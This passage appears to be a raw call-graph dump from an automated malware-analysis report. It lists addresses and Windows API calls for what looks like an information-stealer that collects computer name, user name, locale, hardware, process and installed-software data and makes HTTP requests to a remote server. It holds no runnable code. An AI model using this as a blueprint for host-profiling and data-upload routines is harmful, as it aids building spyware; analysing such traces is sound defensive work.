3 API calls 13166->13167 13168 403be4 13167->13168 13169 410290 lstrcpyA 13168->13169 13170 403bec 13169->13170 13171 410340 3 API calls 13170->13171 13172 403c00 13171->13172 13173 410290 lstrcpyA 13172->13173 13174 403c08 13173->13174 13175 410340 3 API calls 13174->13175 13176 403c1c 13175->13176 13177 410290 lstrcpyA 13176->13177 13178 403c24 13177->13178 13179 4102e0 2 API calls 13178->13179 13180 403c3a 13179->13180 13181 410290 lstrcpyA 13180->13181 13182 403c42 13181->13182 13183 410340 3 API calls 13182->13183 13184 403c56 13183->13184 13185 410290 lstrcpyA 13184->13185 13186 403c5e 13185->13186 13187 410340 3 API calls 13186->13187 13188 403c72 13187->13188 13189 410290 lstrcpyA 13188->13189 13190 403c7a 13189->13190 13191 4102e0 2 API calls 13190->13191 13192 403c8d 13191->13192 13193 410290 lstrcpyA 13192->13193 13194 403c95 13193->13194 13195 410340 3 API calls 13194->13195 13196 403ca9 13195->13196 13197 410290 lstrcpyA 13196->13197 13198 403cb1 13197->13198 13199 410340 3 API calls 13198->13199 13200 403cc5 13199->13200 13201 410290 lstrcpyA 13200->13201 13202 403ccd 13201->13202 13203 410340 3 API calls 13202->13203 13204 403ce1 13203->13204 13205 410290 lstrcpyA 13204->13205 13206 403ce9 13205->13206 13207 410340 3 API calls 13206->13207 13208 403cfd 13207->13208 13209 410290 lstrcpyA 13208->13209 13210 403d05 13209->13210 13211 410340 3 API calls 13210->13211 13212 403d1a 13211->13212 13213 410290 lstrcpyA 13212->13213 13214 403d22 13213->13214 13215 410340 3 API calls 13214->13215 13216 403d36 13215->13216 13217 410290 lstrcpyA 13216->13217 13218 403d3e 13217->13218 13219 410340 3 API calls 13218->13219 13220 403d52 13219->13220 13221 410290 lstrcpyA 13220->13221 13222 403d5a 13221->13222 13223 4102e0 2 API calls 13222->13223 13224 403d6d 13223->13224 13225 410290 lstrcpyA 13224->13225 13226 403d75 13225->13226 13227 410340 3 API calls 13226->13227 13228 403d89 13227->13228 13229 410290 lstrcpyA 13228->13229 13230 403d91 13229->13230 13231 410340 3 API calls 13230->13231 13232 403da5 13231->13232 13233 410290 lstrcpyA 13232->13233 13234 403dad 13233->13234 13235 410340 3 API calls 13234->13235 13236 403dc1 13235->13236 13237 410290 lstrcpyA 13236->13237 13238 403dc9 13237->13238 13239 410340 3 API calls 13238->13239 13240 403ddd 13239->13240 13241 410290 lstrcpyA 13240->13241 13242 403de5 13241->13242 13243 4102e0 2 API calls 13242->13243 13244 403df8 13243->13244 13245 410290 lstrcpyA 13244->13245 13246 403e00 13245->13246 13247 403e14 lstrlenA 13246->13247 13873 410530 13247->13873 13249 403e27 lstrlenA GetProcessHeap HeapAlloc 13250 403f35 InternetCloseHandle InternetCloseHandle InternetCloseHandle 13249->13250 13252 403e4b 13249->13252 13251 4101c0 lstrcpyA 13250->13251 13251->13134 13253 403e65 lstrlenA memcpy 13252->13253 13874 410530 13253->13874 13255 403e81 lstrlenA 13256 403e93 13255->13256 13257 403ea3 lstrlenA memcpy 13256->13257 13259 403ec0 13257->13259 13258 403ed8 lstrlenA 13258->13259 13259->13258 13260 403f62 13259->13260 13261 403ef6 Sleep 13259->13261 13264 403f6e GetProcessHeap HeapFree 13260->13264 13262 403f10 13261->13262 13263 403f0b 13261->13263 13266 403f1c GetProcessHeap HeapFree 13262->13266 13263->13259 13263->13262 13265 403f80 InternetReadFile 13264->13265 13267 403ff7 InternetCloseHandle 13265->13267 13270 403f9d 13265->13270 13266->13250 13266->13265 13267->13151 13268 410340 3 API calls 13268->13270 13269 410290 lstrcpyA 13269->13270 13270->13267 13270->13268 13270->13269 13271 403fd9 InternetReadFile 13270->13271 13271->13267 13271->13270 13879 410530 13272->13879 13274 412d69 strtok_s 13277 412d84 13274->13277 13282 412e3e 13274->13282 13275 412db0 strtok_s 13275->13277 13275->13282 13276 412e8b StrCmpCA 13281 412ec0 strtok_s 13276->13281 13277->13275 13277->13276 13278 410240 lstrlenA lstrcpyA 13277->13278 13277->13282 13294 412fca 13277->13294 13278->13277 13279 410240 lstrlenA lstrcpyA 13279->13294 13280 410240 lstrlenA lstrcpyA 13280->13282 13281->13282 13283 412f4d 13281->13283 13282->12564 13282->13276 13282->13280 13282->13281 13286 413262 StrCmpCA 13282->13286 13282->13294 13283->12564 13284 413010 strtok_s 13284->13294 13297 4132d3 13284->13297 13285 41307f lstrcpyA 13880 411550 SHGetFolderPathA 13285->13880 13287 413277 StrCmpCA 13286->13287 13286->13294 13287->13294 13289 4133a0 StrCmpCA 13295 413360 strtok_s 13289->13295 13289->13297 13290 413384 StrCmpCA 13290->13295 13290->13297 13291 4133d8 StrCmpCA 13291->13295 13291->13297 13292 4133bc StrCmpCA 13292->13295 13292->13297 13293 41340c StrCmpCA 13293->13295 13293->13297 13294->13279 13294->13284 13294->13285 13294->13286 13294->13289 13294->13290 13294->13291 13294->13292 13294->13293 13294->13297 13304 4130ac lstrcpyA 13294->13304 13305 4130d8 lstrcpyA 13294->13305 13306 413104 lstrcpyA 13294->13306 13307 413130 lstrcpyA 13294->13307 13308 411550 lstrcpyA SHGetFolderPathA 13294->13308 13309 41315c lstrcpyA 13294->13309 13310 413188 lstrcpyA 13294->13310 13311 4131b4 lstrcpyA 13294->13311 13312 4131e0 lstrcpyA 13294->13312 13295->13297 13298 4134f6 13295->13298 13296 410240 2 API calls 13296->13297 13297->12564 13297->13289 13297->13290 13297->13291 13297->13292 13297->13293 13297->13295 13297->13296 13299 4134b3 StrCmpCA 13297->13299 13300 413452 StrCmpCA 13297->13300 13301 413475 StrCmpCA 13297->13301 13302 413494 StrCmpCA 13297->13302 13303 41342f StrCmpCA 13297->13303 13298->12564 13299->13297 13300->13295 13300->13297 13301->13297 13302->13297 13303->13295 13303->13297 13304->13294 13305->13294 13306->13294 13307->13294 13308->13294 13309->13294 13310->13294 13311->13294 13312->13294 13883 410530 13313->13883 13315 412aa9 strtok_s 13316 412c24 13315->13316 13323 412ac4 13315->13323 13316->12578 13317 412b00 strtok_s 13317->13316 13317->13323 13318 412bc3 StrCmpCA 13318->13323 13319 412acb StrCmpCA 13319->13317 13320 412b92 StrCmpCA 13320->13323 13321 412b3f StrCmpCA 13321->13323 13322 410240 lstrlenA lstrcpyA 13322->13323 13323->13317 13323->13318 13323->13319 13323->13320 13323->13321 13323->13322 13325 412d8b 13323->13325 13330 412e3e 13323->13330 13324 410240 lstrlenA lstrcpyA 13324->13325 13325->13324 13326 412db0 strtok_s 13325->13326 13328 412e8b StrCmpCA 13325->13328 13325->13330 13353 412fca 13325->13353 13326->13325 13326->13330 13327 412ec0 strtok_s 13329 412f4d 13327->13329 13327->13330 13328->13327 13329->12578 13330->12578 13330->13327 13330->13328 13331 413262 StrCmpCA 13330->13331 13334 410240 lstrlenA lstrcpyA 13330->13334 13330->13353 13333 413277 StrCmpCA 13331->13333 13331->13353 13332 410240 lstrlenA lstrcpyA 13332->13353 13333->13353 13334->13330 13335 413010 strtok_s 13345 4132d3 13335->13345 13335->13353 13336 41307f lstrcpyA 13337 411550 2 API calls 13336->13337 13337->13353 13338 4133a0 StrCmpCA 13343 413360 strtok_s 13338->13343 13338->13345 13339 413384 StrCmpCA 13339->13343 13339->13345 13340 4133d8 StrCmpCA 13340->13343 13340->13345 13341 4133bc StrCmpCA 13341->13343 13341->13345 13342 41340c StrCmpCA 13342->13343 13342->13345 13343->13345 13346 4134f6 13343->13346 13344 410240 2 API calls 13344->13345 13345->12578 13345->13338 13345->13339 13345->13340 13345->13341 13345->13342 13345->13343 13345->13344 13347 4134b3 StrCmpCA 13345->13347 13348 413452 StrCmpCA 13345->13348 13349 413475 StrCmpCA 13345->13349 13350 413494 StrCmpCA 13345->13350 13351 41342f StrCmpCA 13345->13351 13346->12578 13347->13345 13348->13343 13348->13345 13349->13345 13350->13345 13351->13343 13351->13345 13352 4130ac lstrcpyA 13352->13353 13353->13331 13353->13332 13353->13335 13353->13336 13353->13338 13353->13339 13353->13340 13353->13341 13353->13342 13353->13345 13353->13352 13354 4130d8 lstrcpyA 13353->13354 13355 413104 lstrcpyA 13353->13355 13356 411550 lstrcpyA SHGetFolderPathA 13353->13356 13357 413130 lstrcpyA 13353->13357 13358 41315c lstrcpyA 13353->13358 13359 413188 lstrcpyA 13353->13359 13360 4131b4 lstrcpyA 13353->13360 13361 4131e0 lstrcpyA 13353->13361 13354->13353 13355->13353 13356->13353 13357->13353 13358->13353 13359->13353 13360->13353 13361->13353 13884 410530 13362->13884 13364 412c59 strtok_s 13365 412d34 13364->13365 13367 412c74 13364->13367 13365->12592 13366 412cf0 StrCmpCA 13366->13367 13367->13366 13368 410240 lstrlenA lstrcpyA 13367->13368 13369 412ca5 strtok_s 13367->13369 13368->13367 13369->13365 13369->13367 13371 4101c0 lstrcpyA 13370->13371 13372 413528 13371->13372 13373 410340 3 API calls 13372->13373 13374 413538 13373->13374 13375 410290 lstrcpyA 13374->13375 13376 413540 13375->13376 13377 410340 3 API calls 13376->13377 13378 413555 13377->13378 13379 410290 lstrcpyA 13378->13379 13380 41355d 13379->13380 13381 410340 3 API calls 13380->13381 13382 413571 13381->13382 13383 410290 lstrcpyA 13382->13383 13384 413579 13383->13384 13385 410340 3 API calls 13384->13385 13386 41358d 13385->13386 13387 410290 lstrcpyA 13386->13387 13388 413595 13387->13388 13389 410340 3 API calls 13388->13389 13390 4135a9 13389->13390 13391 410290 lstrcpyA 13390->13391 13392 4135b1 13391->13392 13885 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13392->13885 13394 4135bd 13395 410340 3 API calls 13394->13395 13396 4135c6 13395->13396 13397 410290 lstrcpyA 13396->13397 13398 4135ce 13397->13398 13399 410340 3 API calls 13398->13399 13400 4135e2 13399->13400 13401 410290 lstrcpyA 13400->13401 13402 4135ea 13401->13402 13403 410340 3 API calls 13402->13403 13404 4135fe 13403->13404 13405 410290 lstrcpyA 13404->13405 13406 413606 13405->13406 13886 411120 RegOpenKeyExA 13406->13886 13408 413612 13409 410340 3 API calls 13408->13409 13410 41361b 13409->13410 13411 410290 lstrcpyA 13410->13411 13412 413623 13411->13412 13413 410340 3 API calls 13412->13413 13414 413637 13413->13414 13415 410290 lstrcpyA 13414->13415 13416 41363f 13415->13416 13417 410340 3 API calls 13416->13417 13418 413653 13417->13418 13419 410290 lstrcpyA 13418->13419 13420 41365b 13419->13420 13421 410700 7 API calls 13420->13421 13422 41366b 13421->13422 13423 4102e0 2 API calls 13422->13423 13424 413674 13423->13424 13425 410290 lstrcpyA 13424->13425 13426 41367c 13425->13426 13427 410340 3 API calls 13426->13427 13428 413697 13427->13428 13429 410290 lstrcpyA 13428->13429 13430 41369f 13429->13430 13431 410340 3 API calls 13430->13431 13432 4136b3 13431->13432 13433 410290 lstrcpyA 13432->13433 13434 4136bb 13433->13434 13435 410540 14 API calls 13434->13435 13436 4136c8 13435->13436 13437 4102e0 2 API calls 13436->13437 13438 4136d1 13437->13438 13439 410290 lstrcpyA 13438->13439 13440 4136d9 13439->13440 13441 410340 3 API calls 13440->13441 13442 4136f4 13441->13442 13443 410290 lstrcpyA 13442->13443 13444 4136fc 13443->13444 13445 410340 3 API calls 13444->13445 13446 413710 13445->13446 13447 410290 lstrcpyA 13446->13447 13448 413718 13447->13448 13449 41371f GetCurrentProcessId 13448->13449 13889 411cc0 OpenProcess 13449->13889 13452 4102e0 2 API calls 13453 413735 13452->13453 13454 410290 lstrcpyA 13453->13454 13455 41373d 13454->13455 13456 410340 3 API calls 13455->13456 13457 413758 13456->13457 13458 410290 lstrcpyA 13457->13458 13459 413760 13458->13459 13460 410340 3 API calls 13459->13460 13461 413774 13460->13461 13462 410290 lstrcpyA 13461->13462 13463 41377c 13462->13463 13464 410340 3 API calls 13463->13464 13465 413790 13464->13465 13466 410290 lstrcpyA 13465->13466 13467 413798 13466->13467 13468 410340 3 API calls 13467->13468 13469 4137ac 13468->13469 13470 410290 lstrcpyA 13469->13470 13471 4137b4 13470->13471 13894 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13471->13894 13474 410340 3 API calls 13475 4137c9 13474->13475 13476 410290 lstrcpyA 13475->13476 13477 4137d1 13476->13477 13478 410340 3 API calls 13477->13478 13479 4137e5 13478->13479 13480 410290 lstrcpyA 13479->13480 13481 4137ed 13480->13481 13482 410340 3 API calls 13481->13482 13483 413801 13482->13483 13484 410290 lstrcpyA 13483->13484 13485 413809 13484->13485 13902 411200 13485->13902 13488 4102e0 2 API calls 13489 41381f 13488->13489 13490 410290 lstrcpyA 13489->13490 13491 413827 13490->13491 13492 410340 3 API calls 13491->13492 13493 413842 13492->13493 13494 410290 lstrcpyA 13493->13494 13495 41384a 13494->13495 13496 410340 3 API calls 13495->13496 13497 41385e 13496->13497 13498 410290 lstrcpyA 13497->13498 13499 413866 13498->13499 13500 411200 lstrcpyA 13499->13500 13501 413873 13500->13501 13502 4102e0 2 API calls 13501->13502 13503 41387c 13502->13503 13504 410290 lstrcpyA 13503->13504 13505 413884 13504->13505 13506 410340 3 API calls 13505->13506 13507 41389f 13506->13507 13508 410290 lstrcpyA 13507->13508 13509 4138a7 13508->13509 13510 410340 3 API calls 13509->13510 13511 4138bb 13510->13511 13512 410290 lstrcpyA 13511->13512 13513 4138c3 13512->13513 13905 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13513->13905 13515 4138cf 13516 410340 3 API calls 13515->13516 13517 4138d8 13516->13517 13518 410290 lstrcpyA 13517->13518 13519 4138e0 13518->13519 13520 410340 3 API calls 13519->13520 13521 4138f4 13520->13521 13522 410290 lstrcpyA 13521->13522 13523 4138fc 13522->13523 13524 410340 3 API calls 13523->13524 13525 413910 13524->13525 13526 410290 lstrcpyA 13525->13526 13527 413918 13526->13527 13906 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13527->13906 13529 413924 13530 410340 3 API calls 13529->13530 13531 41392d 13530->13531 13532 410290 lstrcpyA 13531->13532 13533 413935 13532->13533 13534 410340 3 API calls 13533->13534 13535 413949 13534->13535 13536 410290 lstrcpyA 13535->13536 13537 413951 13536->13537 13538 410340 3 API calls 13537->13538 13539 413965 13538->13539 13540 410290 lstrcpyA 13539->13540 13541 41396d 13540->13541 13907 4110a0 7 API calls 13541->13907 13544 4102e0 2 API calls 13545 413983 13544->13545 13546 410290 lstrcpyA 13545->13546 13547 41398b 13546->13547 13548 410340 3 API calls 13547->13548 13549 4139a6 13548->13549 13550 410290 lstrcpyA 13549->13550 13551 4139ae 13550->13551 13552 410340 3 API calls 13551->13552 13553 4139c2 13552->13553 13554 410290 lstrcpyA 13553->13554 13555 4139ca 13554->13555 13910 4109f0 13555->13910 13558 4102e0 2 API calls 13559 4139e0 13558->13559 13560 410290 lstrcpyA 13559->13560 13561 4139e8 13560->13561 13562 410340 3 API calls 13561->13562 13563 413a03 13562->13563 13564 410290 lstrcpyA 13563->13564 13565 413a0b 13564->13565 13566 410340 3 API calls 13565->13566 13567 413a1f 13566->13567 13568 410290 lstrcpyA 13567->13568 13569 413a27 13568->13569 13928 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13569->13928 13571 413a33 13572 410340 3 API calls 13571->13572 13573 413a3c 13572->13573 13574 410290 lstrcpyA 13573->13574 13575 413a44 13574->13575 13576 410340 3 API calls 13575->13576 13577 413a58 13576->13577 13578 410290 lstrcpyA 13577->13578 13579 413a60 13578->13579 13580 410340 3 API calls 13579->13580 13581 413a74 13580->13581 13582 410290 lstrcpyA 13581->13582 13583 413a7c 13582->13583 13929 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13583->13929 13586 410340 3 API calls 13587 413a91 13586->13587 13588 410290 lstrcpyA 13587->13588 13589 413a99 13588->13589 13590 410340 3 API calls 13589->13590 13591 413aad 13590->13591 13592 410290 lstrcpyA 13591->13592 13593 413ab5 13592->13593 13594 410340 3 API calls 13593->13594 13595 413ac9 13594->13595 13596 410290 lstrcpyA 13595->13596 13597 413ad1 13596->13597 13598 410340 3 API calls 13597->13598 13599 413ae5 13598->13599 13600 410290 lstrcpyA 13599->13600 13601 413aed 13600->13601 13932 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13601->13932 13603 413af9 13604 410340 3 API calls 13603->13604 13605 413b02 13604->13605 13606 410290 lstrcpyA 13605->13606 13607 413b0a 13606->13607 13608 410340 3 API calls 13607->13608 13609 413b1e 13608->13609 13610 410290 lstrcpyA 13609->13610 13611 413b26 13610->13611 13612 410340 3 API calls 13611->13612 13613 413b3a 13612->13613 13614 410290 lstrcpyA 13613->13614 13615 413b42 13614->13615 13935 410be0 13615->13935 13618 410340 3 API calls 13619 413b57 13618->13619 13620 410290 lstrcpyA 13619->13620 13621 413b5f 13620->13621 13622 410340 3 API calls 13621->13622 13623 413b73 13622->13623 13624 410290 lstrcpyA 13623->13624 13625 413b7b 13624->13625 13626 410340 3 API calls 13625->13626 13627 413b8f 13626->13627 13628 410290 lstrcpyA 13627->13628 13629 413b97 13628->13629 13952 410ba0 GetSystemInfo wsprintfA 13629->13952 13631 413ba3 13632 410340 3 API calls 13631->13632 13633 413bac 13632->13633 13634 410290 lstrcpyA 13633->13634 13635 413bb4 13634->13635 13636 410340 3 API calls 13635->13636 13637 413bc8 13636->13637 13638 410290 lstrcpyA 13637->13638 13639 413bd0 13638->13639 13640 410340 3 API calls 13639->13640 13641 413be4 13640->13641 13642 410290 lstrcpyA 13641->13642 13643 413bec 13642->13643 13953 410cb0 GetProcessHeap HeapAlloc 13643->13953 13645 413bf8 13646 410340 3 API calls 13645->13646 13647 413c01 13646->13647 13648 410290 lstrcpyA 13647->13648 13649 413c09 13648->13649 13650 410340 3 API calls 13649->13650 13651 413c1d 13650->13651 13652 410290 lstrcpyA 13651->13652 13653 413c25 13652->13653 13654 410340 3 API calls 13653->13654 13655 413c39 13654->13655 13656 410290 lstrcpyA 13655->13656 13657 413c41 13656->13657 13956 410d30 13657->13956 13660 4102e0 2 API calls 13661 413c57 13660->13661 13662 410290 lstrcpyA 13661->13662 13663 413c5f 13662->13663 13664 410340 3 API calls 13663->13664 13665 413c7a 13664->13665 13666 410290 lstrcpyA 13665->13666 13667 413c82 13666->13667 13668 410340 3 API calls 13667->13668 13669 413c96 13668->13669 13670 410290 lstrcpyA 13669->13670 13671 413c9e 13670->13671 13961 410fe0 13671->13961 13673 413cab 13674 4102e0 2 API calls 13673->13674 13675 413cb4 13674->13675 13676 410290 lstrcpyA 13675->13676 13677 413cbc 13676->13677 13678 410340 3 API calls 13677->13678 13679 413cd7 13678->13679 13680 410290 lstrcpyA 13679->13680 13681 413cdf 13680->13681 13682 410340 3 API calls 13681->13682 13683 413cf3 13682->13683 13684 410290 lstrcpyA 13683->13684 13685 413cfb 13684->13685 13970 410d80 13685->13970 13688 4102e0 2 API calls 13689 413d16 13688->13689 13690 410290 lstrcpyA 13689->13690 13691 413d1e 13690->13691 13692 410d80 16 API calls 13691->13692 13693 413d37 13692->13693 13694 4102e0 2 API calls 13693->13694 13695 413d40 13694->13695 13696 410290 lstrcpyA 13695->13696 13697 413d48 13696->13697 13698 410340 3 API calls 13697->13698 13699 413d63 13698->13699 13700 410290 lstrcpyA 13699->13700 13701 413d6b 13700->13701 13702 413d8a lstrlenA 13701->13702 13703 413d97 13702->13703 13704 4101c0 lstrcpyA 13703->13704 13705 413da7 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413db3 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dbf 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413dcb 13710->13711 13712 410200 lstrcpyA 13711->13712 13713 413de1 13712->13713 13986 413e50 13713->13986 13715 413e0f 13715->12602 13717 40e806 13716->13717 13755 40e456 13716->13755 13718 410200 lstrcpyA 13717->13718 13719 40e81a 13718->13719 13721 410200 lstrcpyA 13719->13721 13720 40e4ad StrCmpCA 13720->13755 13722 40e829 13721->13722 13723 410200 lstrcpyA 13722->13723 13725 40e838 13723->13725 13724 40e5b3 StrCmpCA 13724->13755 13726 410200 lstrcpyA 13725->13726 13728 40e84e 13726->13728 13727 4101c0 lstrcpyA 13727->13755 14793 40d9c0 memset memset memset memset RegOpenKeyExA 13728->14793 13729 40e73a StrCmpCA 13729->13755 13731 410340 lstrlenA lstrcpyA lstrcatA 13731->13755 13732 40e86b 13733 410200 lstrcpyA 13732->13733 13735 40e87c 13733->13735 13734 4102e0 2 API calls 13734->13755 13736 410200 lstrcpyA 13735->13736 13737 40e887 13736->13737 13738 410200 lstrcpyA 13737->13738 13740 40e892 13738->13740 13739 410290 lstrcpyA 13739->13755 13741 410200 lstrcpyA 13740->13741 13742 40e8a8 13741->13742 14828 40de80 13742->14828 13743 410200 lstrcpyA 13743->13755 13747 40e91d StrCmpCA 13761 40e8c5 13747->13761 13748 40ea23 StrCmpCA 13748->13761 13749 40ec76 13750 4101c0 lstrcpyA 13750->13761 13751 40ebaa StrCmpCA 13751->13761 13752 4102e0 2 API calls 13752->13761 13753 410340 lstrlenA lstrcpyA lstrcatA 13753->13761 13754 410290 lstrcpyA 13754->13761 13755->13717 13755->13720 13755->13724 13755->13727 13755->13729 13755->13731 13755->13734 13755->13739 13755->13743 14498 40b0f0 13755->14498 14574 40b4e0 13755->14574 14731 40cdf0 13755->14731 13756 40b0f0 443 API calls 13756->13761 13758 40cdf0 61 API calls 13758->13761 13759 410200 lstrcpyA 13759->13761 13760 40b4e0 444 API calls 13760->13761 13761->13747 13761->13748 13761->13749 13761->13750 13761->13751 13761->13752 13761->13753 13761->13754 13761->13756 13761->13758 13761->13759 13761->13760 13763 410409 13762->13763 13764 4103b2 13762->13764 13765 4103d7 lstrcpyA 13764->13765 13766 4103c9 13764->13766 13765->13766 13766->12851 13768 410200 lstrcpyA 13767->13768 13769 416930 13768->13769 13770 410200 lstrcpyA 13769->13770 13771 416939 13770->13771 13810 404280 13771->13810 13773 416943 13774 4101c0 lstrcpyA 13773->13774 13775 416954 13774->13775 13836 410500 StrCmpCA 13775->13836 13777 41695c 13777->12888 13779 4169dd 13778->13779 13780 4101c0 lstrcpyA 13779->13780 13781 4169f1 13780->13781 13782 410200 lstrcpyA 13781->13782 13783 4169fa 13782->13783 13784 404280 21 API calls 13783->13784 13785 416a04 13784->13785 13786 410290 lstrcpyA 13785->13786 13787 416a11 13786->13787 13788 416a25 StrCmpCA 13787->13788 13789 416a35 13788->13789 13790 416abb 13788->13790 13792 416a45 lstrlenA 13789->13792 13791 4101c0 lstrcpyA 13790->13791 13805 416ab9 13791->13805 13793 416a51 13792->13793 13845 4115b0 13793->13845 13795 416a58 13795->13790 13796 416a5c 13795->13796 13797 416a6c StrStrA 13796->13797 13798 416a7e 13797->13798 13797->13805 13800 416a8e lstrlenA 13798->13800 13799 4101c0 lstrcpyA 13799->13805 13849 411490 13800->13849 13803 416ab0 13807 4101c0 lstrcpyA 13803->13807 13804 416b28 13806 4101c0 lstrcpyA 13804->13806 13805->13799 13806->13805 13807->13805 13808->12870 13809->12888 13811 410200 lstrcpyA 13810->13811 13812 4042a9 13811->13812 13837 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13812->13837 13814 4042b3 13815 4101c0 lstrcpyA 13814->13815 13816 4042c2 13815->13816 13817 4042cf InternetOpenA StrCmpCA 13816->13817 13818 404302 InternetConnectA 13817->13818 13819 404444 13817->13819 13818->13819 13820 40433b HttpOpenRequestA 13818->13820 13823 4101c0 lstrcpyA 13819->13823 13821 404371 13820->13821 13822 40446b InternetCloseHandle 13820->13822 13824 404377 InternetSetOptionA 13821->13824 13825 40438d HttpSendRequestA HttpQueryInfoA 13821->13825 13822->13819 13832 404451 13823->13832 13824->13825 13826 4043c1 13825->13826 13827 40445c 13825->13827 13826->13827 13835 4043d2 13826->13835 13828 4101c0 lstrcpyA 13827->13828 13828->13832 13829 404477 InternetCloseHandle 13831 410200 lstrcpyA 13829->13831 13830 4043f0 InternetReadFile 13830->13829 13830->13835 13831->13832 13832->13773 13833 410340 3 API calls 13833->13835 13834 410290 lstrcpyA 13834->13835 13835->13829 13835->13830 13835->13833 13835->13834 13836->13777 13843 410530 13837->13843 13839 4028e9 lstrlenA 13844 410530 13839->13844 13841 4028f5 InternetCrackUrlA 13842 402903 13841->13842 13842->13814 13843->13839 13844->13841 13846 4115c2 13845->13846 13848 4115e2 13845->13848 13847 4115ce LocalAlloc 13846->13847 13846->13848 13847->13848 13848->13795 13848->13848 13850 41149b lstrlenA 13849->13850 13850->13803 13850->13804 13852 410720 13851->13852 13853 41079e 13851->13853 13854 4101c0 lstrcpyA 13852->13854 13855 4101c0 lstrcpyA 13853->13855 13856 410730 memset 13854->13856 13857 4107aa 13855->13857 13858 410754 13856->13858 13857->12917 13859 411e60 3 API calls 13858->13859 13860 410761 13859->13860 13861 410768 lstrcatA 13860->13861 13870 410230 13861->13870 13863 41077a lstrcatA 13864 41078d 13863->13864 13865 4101c0 lstrcpyA 13864->13865 13866 410795 13865->13866 13866->13857 13868 4101c0 lstrcpyA 13867->13868 13869 411e96 13868->13869 13869->12921 13871 410237 13870->13871 13871->13863 13872->13068 13873->13249 13874->13255 13876 4077b8 LocalAlloc 13875->13876 13878 40402f 13876->13878 13878->13112 13878->13114 13879->13274 13881 4101c0 lstrcpyA 13880->13881 13882 411597 13881->13882 13882->13294 13883->13315 13884->13364 13885->13394 13887 4111d5 RegCloseKey CharToOemA 13886->13887 13888 4111b8 RegQueryValueExA 13886->13888 13887->13408 13888->13887 13890 411d01 13889->13890 13891 411ce7 K32GetModuleFileNameExA CloseHandle 13889->13891 13892 4101c0 lstrcpyA 13890->13892 13891->13890 13893 411d0b 13892->13893 13893->13452 13895 410824 RegQueryValueExA 13894->13895 13896 41083d RegCloseKey 13894->13896 13895->13896 13897 41084c 13896->13897 13898 41089b 13897->13898 13899 41085b RegOpenKeyExA 13897->13899 13898->13474 13900 410890 RegCloseKey 13899->13900 13901 410877 RegQueryValueExA 13899->13901 13900->13898 13901->13900 13903 4101c0 lstrcpyA 13902->13903 13904 411211 13903->13904 13904->13488 13905->13515 13906->13529 13908 4101c0 lstrcpyA 13907->13908 13909 41110b 13908->13909 13909->13544 13911 4101c0 lstrcpyA 13910->13911 13912 410a0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 13911->13912 13913 410a3b GetLocaleInfoA 13912->13913 13927 410b0f 13912->13927 13914 410340 3 API calls 13913->13914 13917 410a64 13914->13917 13915 410b17 LocalFree 13916 410b1e 13915->13916 13916->13558 13918 410290 lstrcpyA 13917->13918 13919 410a6c 13918->13919 14002 411270 13919->14002 13921 410aa0 GetLocaleInfoA 13922 410340 3 API calls 13921->13922 13923 410a84 13922->13923 13923->13915 13923->13921 13924 410340 3 API calls 13923->13924 13925 410290 lstrcpyA 13923->13925 13926 411270 memset 13923->13926 13923->13927 13924->13923 13925->13923 13926->13923 13927->13915 13927->13916 13928->13571 13930 4109e5 13929->13930 13931 4109bd wsprintfA 13929->13931 13930->13586 13931->13930 13933 410b72 RegQueryValueExA 13932->13933 13934 410b8b RegCloseKey 13932->13934 13933->13934 13934->13603 13936 410c12 GetLogicalProcessorInformationEx 13935->13936 13937 410c36 13936->13937 13938 410c1f GetLastError 13936->13938 13941 410c97 13937->13941 13942 410c3d 13937->13942 13939 410c86 13938->13939 13940 410c2a 13938->13940 13944 410c95 13939->13944 13945 4112b0 2 API calls 13939->13945 13948 410c00 13940->13948 13943 4112b0 2 API calls 13941->13943 13949 4112b0 2 API calls 13942->13949 13943->13944 13944->13618 13945->13944 13948->13936 13948->13944 14005 4112e0 GetProcessHeap HeapAlloc 13948->14005 14006 4112b0 13948->14006 13950 410c6c 13949->13950 13950->13944 13951 410c70 wsprintfA 13950->13951 13951->13944 13952->13631 13954 411270 memset 13953->13954 13955 410cdf GlobalMemoryStatusEx wsprintfA 13954->13955 13955->13645 13957 4101c0 lstrcpyA 13956->13957 13958 410d4a 13957->13958 13959 410d70 13958->13959 13960 410240 2 API calls 13958->13960 13959->13660 13960->13959 13962 4101c0 lstrcpyA 13961->13962 13963 410ffd CreateToolhelp32Snapshot Process32First 13962->13963 13964 411021 Process32Next 13963->13964 13965 411084 CloseHandle 13963->13965 13964->13965 13968 411031 13964->13968 13965->13673 13966 410290 lstrcpyA 13966->13968 13967 410340 lstrlenA lstrcpyA lstrcatA 13967->13968 13968->13966 13968->13967 13969 411074 Process32Next 13968->13969 13969->13965 13969->13968 13971 4101c0 lstrcpyA 13970->13971 13972 410da4 RegOpenKeyExA 13971->13972 13973 410fcc 13972->13973 13974 410ddc RegEnumKeyExA 13972->13974 13973->13688 13975 410fbb RegCloseKey 13974->13975 13976 410e1e 13974->13976 13975->13973 13977 410e74 wsprintfA RegOpenKeyExA 13976->13977 13978 410fb1 RegCloseKey 13977->13978 13979 410eae RegQueryValueExA 13977->13979 13978->13975 13980 410e30 RegCloseKey RegEnumKeyExA 13979->13980 13981 410edb lstrlenA 13979->13981 13980->13975 13980->13977 13981->13980 13985 410eeb 13981->13985 13982 410f39 RegQueryValueExA 13982->13980 13982->13985 13983 410340 lstrlenA lstrcpyA lstrcatA 13983->13985 13984 410290 lstrcpyA 13984->13985 13985->13980 13985->13982 13985->13983 13985->13984 13987 413e69 13986->13987 13988 410290 lstrcpyA 13987->13988 13989 413eac 13988->13989 13990 410290 lstrcpyA 13989->13990 13991 413ee1 13990->13991 13992 410290 lstrcpyA 13991->13992 13993 413eef 13992->13993 13994 410290 lstrcpyA 13993->13994 13995 413efb 13994->13995 13996 413f0a Sleep 13995->13996 13999 413f17 13995->13999 13996->13995 13997 413f5a CreateThread WaitForSingleObject 13998 4101c0 lstrcpyA 13997->13998 14271 416ea0 13997->14271 14001 413f8b 13998->14001 13999->13997 